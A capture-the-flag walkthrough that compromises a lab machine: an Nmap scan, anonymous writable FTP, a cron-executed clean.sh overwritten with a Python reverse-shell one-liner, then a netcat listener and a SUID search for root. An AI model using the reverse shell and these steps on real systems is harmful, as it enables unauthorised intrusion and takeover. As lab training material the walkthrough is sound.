In this machine, we have to get two flags
So first we started with a Nmap scan to know the running services and open ports.
command "nmap -A -vv ip_address"
Nmap scan result:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-01 14:14 UTC
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:15
Completed NSE at 14:15, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:15
Completed NSE at 14:15, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:15
Completed NSE at 14:15, 0.00s elapsed
Initiating Ping Scan at 14:15
Scanning 10.10.159.183 [4 ports]
Completed Ping Scan at 14:15, 0.19s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:15
Completed Parallel DNS resolution of 1 host. at 14:15, 0.00s elapsed
Initiating SYN Stealth Scan at 14:15
Scanning 10.10.159.183 [1000 ports]
Discovered open port 445/tcp on 10.10.159.183
Discovered open port 21/tcp on 10.10.159.183
Discovered open port 139/tcp on 10.10.159.183
Discovered open port 22/tcp on 10.10.159.183
Completed SYN Stealth Scan at 14:15, 2.96s elapsed (1000 total ports)
Initiating Service scan at 14:15
Scanning 4 services on 10.10.159.183
Completed Service scan at 14:15, 11.46s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 10.10.159.183
Retrying OS detection (try #2) against 10.10.159.183
Retrying OS detection (try #3) against 10.10.159.183
Retrying OS detection (try #4) against 10.10.159.183
Retrying OS detection (try #5) against 10.10.159.183
Initiating Traceroute at 14:15
Completed Traceroute at 14:15, 0.15s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 14:15
Completed Parallel DNS resolution of 2 hosts. at 14:15, 0.01s elapsed
NSE: Script scanning 10.10.159.183.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:15
NSE: [ftp-bounce 10.10.159.183:21] PORT response: 500 Illegal PORT command.
Completed NSE at 14:15, 6.18s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:15
Completed NSE at 14:15, 0.49s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:15
Completed NSE at 14:15, 0.00s elapsed
Nmap scan report for 10.10.159.183
Host is up, received echo-reply ttl 63 (0.18s latency).
Scanned at 2020-06-01 14:15:00 UTC for 37s
Not shown: 996 closed ports
Reason: 996 resets
PORT STATE SERVICE REASON VERSION
21/tcp open FTP syn-ack TTL 63 vsftpd 2.0.8 or later
| FTP-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 2 111 113 4096 May 17 21:30 scripts [NSE: writeable]
| Ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.9.18.200
| Logged in as FTP
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8b:ca:21:62:1c:2b:23:fa:6b:c6:1f:a8:13:fe:1c:68 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDCi47ePYjDctfwgAphABwT1jpPkKajXoLvf3bb/zvpvDvXwWKnm6nZuzL2HA1veSQa90ydSSpg8S+B8SLpkFycv7iSy2/Jmf7qY+8oQxWThH1fwBMIO5g/TTtRRta6IPoKaMCle8hnp5pSP5D4saCpSW3E5rKd8qj3oAj6S8TWgE9cBNJbMRtVu1+sKjUy/7ymikcPGAjRSSaFDroF9fmGDQtd61oU5waKqurhZpre70UfOkZGWt6954rwbXthTeEjf+4J5+gIPDLcKzVO7BxkuJgTqk4lE9ZU/5INBXGpgI5r4mZknbEPJKS47XaOvkqm9QWveoOSQgkqdhIPjnhD
| 256 95:89:a4:12:e2:e6:ab:90:5d:45:19:ff:41:5f:74:ce (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPjHnAlR7sBuoSM2X5sATLllsFrcUNpTS87qXzhMD99aGGzyOlnWmjHGNmm34cWSzOohxhoK2fv9NWwcIQ5A/ng=
| 256 e1:2a:96:a4:ea:8f:68:8f:cc:74:b8:f0:28:72:70:cd (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDHIuFL9AdcmaAIY7u+aJil1covB44FA632BSQ7sUqap
139/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=6/1%OT=21%CT=1%CU=39405%PV=Y%DS=2%DC=T%G=Y%TM=5ED50D89
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=FE%GCD=1%ISR=10E%TI=Z%CI=Z%II=I%TS=A)OPS(O
OS:1=M472ST11NW6%O2=M472ST11NW6%O3=M472NNT11NW6%O4=M472ST11NW6%O5=M472ST11N
OS:W6%O6=M472ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN(R
OS:=Y%DF=Y%T=40%W=F507%O=M472NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%
OS:RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y
OS:%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R
OS:%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=
OS:40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S
OS:)
Uptime guess: 10.488 days (since Fri May 22 02:32:32 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=254 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: ANONYMOUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 5s, deviation: 0s, median: 4s
| nbstat: NetBIOS name: ANONYMOUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| ANONYMOUS<00> Flags: <unique><active>
| ANONYMOUS<03> Flags: <unique><active>
| ANONYMOUS<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| Statistics:
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 55781/tcp): CLEAN (Couldn't connect)
| Check 2 (port 59503/tcp): CLEAN (Couldn't connect)
| Check 3 (port 38497/udp): CLEAN (Failed to receive data)
| Check 4 (port 12649/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: anonymous
| NetBIOS computer name: ANONYMOUS\x00
| Domain name: \x00
| FQDN: anonymous
|_ System time: 2020-06-01T14:15:36+00:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-06-01T14:15:36
|_ start_date: N/A
TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 148.19 ms 10.9.0.1
2 150.07 ms 10.10.159.183
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:15
Completed NSE at 14:15, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:15
Completed NSE at 14:15, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:15
Completed NSE at 14:15, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap did: 1 IP address (1 host up) scanned in 38.52 seconds
Raw packets sent: 1139 (54.222KB) | Rcvd: 1083 (46.894KB)
So now we got some open ports on port 21 FTP service is running and allows Anonymous Login. So let's check out that.
command "FTP target IP"
So now you can see we have successfully logged in through FTP let's
check the directories with "ls" command now we can see "scripts"
directory is there let's go inside the directory with "cd scripts"
command and by doing "ls" we can see the files present in the scripts
directory.
So now we downloaded all the files from the "scripts" directory you can use "get" command to download the files "get clean.sh" and we can see the "clean.sh" has all read, write, execute permissions.
So "clean.sh" is a bash script and looks like a cleanup script that deletes the files present in the "tmp" directory. and the "removed_files.log" file is a log file that shows the deleted files from the "tmp" directory.
Cron job:-
A cron job is a Linux command used for scheduling tasks to be executed sometime in the future.
A cron job is a Linux command used for scheduling tasks to be executed sometime in the future.
So we know that "clean.sh" file will get executed we can change the code of the file with the reverse shell we are using python reverse shell from pentest monkey website and don't forget to change the "IP address" in the reverse shell script.
So we have already downloaded the files so now let's edit the "clean.sh"
Python reverse shell script:-
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<your_ip>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Replace the code of "clean.sh" file by python reverse shell and change the IP address and save it now we have to upload this "clean.sh" file so open the terminal where you saved the "clean.sh" file and connect to the FTP and upload the "clean.sh" file with "put clean.sh" command.
The "clean.sh" will get executed automatically so now, we have to start the listener to get a reverse connection open a terminal and run the command "nc
-lvp port number".It will take time to get a reverse shell.
We have successfully got the shell now let's run these commands "whoami" and "ls".
We have got user flag to see the flag run this command "cat user.txt" Now we have to escalate our privileges let's check what permissions do we have with command "sudo -l"
It didn't worked so now we have to search for the SUID binaries.
SUID files - SUID is special file permission for executable files that enables other users to run the file with effective permissions of the file owner. Instead of the normal x which represents execute permissions, you will see an s (to indicate SUID) special permission for the user.
To search SUID files run this command
find / -perm -u=s -type f 2>/dev/null
So we have got the list of SUID files so let's check on the GTFObins website.
GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.
So now we can execute this command to get root access to let's run the command
Now we are root and can read the root flag with the "cat root.txt" command.
0 Comments